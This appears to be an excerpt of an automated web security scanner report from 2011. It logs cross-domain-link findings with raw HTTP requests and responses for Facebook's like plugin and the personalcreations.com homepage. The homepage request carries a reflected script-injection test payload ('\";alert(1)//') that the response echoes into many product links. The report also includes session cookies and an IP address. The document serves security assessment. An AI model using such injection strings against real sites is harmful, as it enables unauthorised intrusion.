The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.28. http://www.personalcreations.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="outerContainer">
               

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>


<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico"/>

<div id="Header">
...[SNIP]...
<a id="_ctl9__homeLink" border="0" title="Go to Personal Creations Homepage" href="http://www.personalcreations.com/sitemap.aspx?Ref=HomeNoRef" style="height:78px;width:212px;"><img height="78px" width="212px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Personal Creations Homepage" border="0" /></a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=PCR">Your Account</a>
...[SNIP]...
<li><a rel="nofollow" class="HeaderLink" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=PCR">Order Tracking</a>
...[SNIP]...
<a id="_ctl9__ctl7_lkCart" class="SecondaryColor HeaderLink" href="http://gifts.personalcreations.com/ShoppingCart.aspx?Ref=HomeNoRef"><img style="border:0 none;" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Shopping Cart" />&nbsp;&nbsp;shopping cart&nbsp;0</a>
...[SNIP]...
<div id="TopNav"> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/common_pcr.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
_ctl14_submit" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.personalcreations.com/ProductSearch.aspx?Ref=HomeNoRef" style="height:21px;width:41px;display:inline;float:left;"><img class="sch_smallGo" height="21px" width="41px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl0_herolink" border="0" href="/personalized-mothers-day-gifts-PMOMDAY?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl0_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide1_BelatedMday11.jpg" alt="Shop Bestselling Mother&#39;s Day Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl1_herolink" border="0" href="/personalized-communion-gifts-PCOMMUN?tile=hmpg_hero2&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl1_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/firstcommunion-slide-copy.jpg" alt="Shop Bestselling First Communion Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl2_herolink" border="0" href="/personalized-kids-gifts-PBKDBSL?tile=hmpg_hero3&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl2_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide4_BabyKidsQuilts.jpg" alt="Shop Bestselling Baby &amp; Kids Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_DHero_rptSlides__ctl3_herolink" border="0" href="/personalized-anniversary-gifts-PANNBSL?tile=hmpg_hero4&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_DHero_rptSlides__ctl3_heroimage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/758x310_PCHero_Slide3_Anniv.jpg" alt="Shop Bestselling Anniversary Gifts" border="0" /></a>
...[SNIP]...
<a id="_ctl11_TopPodHyperlink" border="0" href="/personalized-graduation-gifts-PGRADUA?tile=hmpg_topHeroPod&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_TopPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_PodA_193x154_Mday_0421.jpg" alt="Shop Bestselling Graduation Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
<a id="_ctl11_BottomPodHyperlink" border="0" href="/personalized-birthday-gifts-PBIRBSL?tile=hmpg_bottomHeroPod&amp;Ref=HomeNoRef" target="_self"><img id="_ctl11_BottomPodImage" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_RightTopHeroPod_Birthday.jpg" alt="Shop Bestselling Birthday Gifts" border="0" style="height:154px;width:193px;" /></a>
...[SNIP]...
alcreations.com/gifts/Heart-Stepping-Stone-30016152?viewpos=1&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart Stepping Stone" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl0__ctl0__noCustomerReviews" class="SmallSize ReviewWrapper" style="color:#990000;font-weight:bold;">
...[SNIP]...
alcreations.com/gifts/Tender-Heart-Platter-30028686?viewpos=2&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Tender Heart Platter" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_3.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Reasons-IWe-Love-Photo-Frame-30024035?viewpos=3&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Reasons I/We Love Photo Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_3.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
eations.com/gifts/MY-MOMMYS-EMBRACE-PRINTS-30016923?viewpos=4&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="My Mommy&#39;s Embrace Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts/Oversized-Metal-Family-Tree-Sculpture-30021353?viewpos=5&amp;trackingpgroup=PHMPG01&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Oversized Metal Family Tree Sculpture" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
com/gifts/CommunionConfirmation-Wall-Cross-30015952?viewpos=1&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Wall Cross" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_1.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/CommunionConfirmation-Glass-Frame-30015469?viewpos=2&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Glass Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ations.com/gifts/First-Communion-Gift-Sets-30026755?viewpos=3&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="First Communion Gift Sets" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
m/gifts/CommunionConfiramtion-Keepsake-Box-30019169?viewpos=4&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Communion/Confirmation Keepsake Box" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Childrens-Catholic-Bible--Burgundy-Cover-30020916?viewpos=5&amp;trackingpgroup=PHMPG02&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Children&#39;s Catholic Bible - Burgundy Cover" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
lcreations.com/gifts/Graduation-Wall-Cross-30021213?viewpos=1&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Wall Cross" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ations.com/flowers/Graduation-Tassel-Frame-30049637?viewpos=2&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Tassel Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__noCustomerReviews" class="SmallSize ReviewWrapper" style="color:#990000;font-weight:bold;">
...[SNIP]...
s.com/gifts/School-Color-Graduation-Banner-30021331?viewpos=3&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="School Color Graduation Oversized Banner" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
nalcreations.com/gifts/Graduation-Bracelet-30028362?viewpos=4&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Bracelet" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
eations.com/gifts/Graduation-Message-Frame-30021069?viewpos=5&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Message Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
tions.com/gifts/Heart-in-Sand-Framed-Print-30021311?viewpos=1&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
